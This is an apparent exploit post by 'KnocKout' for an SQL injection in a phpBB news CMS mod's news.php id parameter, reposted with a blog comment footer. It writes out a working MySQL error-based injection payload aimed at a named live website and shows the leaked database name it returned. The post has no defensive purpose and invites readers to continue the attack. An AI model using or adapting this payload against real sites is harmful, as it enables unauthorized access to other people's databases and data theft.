~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : phpBB MOD by (news CMS)
|~Price : N/A
|~Version : N/A
|~Software: www.phpbb.com
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /news/
|~sqL : MySQL error based
|~Google Keyword : N/A
|[~]Tested on : (L):Vista (R):Apache/2.2.9 (Debian) PHP/5.2.6-1 and Demos
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Explotation| MySQL error based SQL Injection~~~~~~~~~~~}|
http://$Site/$path//news/news.php?id= {SQL Injection}
[~] SQL Injecting
http://www.travelguide-bg.com/news/news.php?id=1
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
[~] MSSQL Error : Duplicate entry '~'EFH_Production'~1' for key 1
[+] DB Name : 'EFH_Production' [OK]
To your Continue..
..
=============================================================
Hiç yorum yok:
Yorum Gönder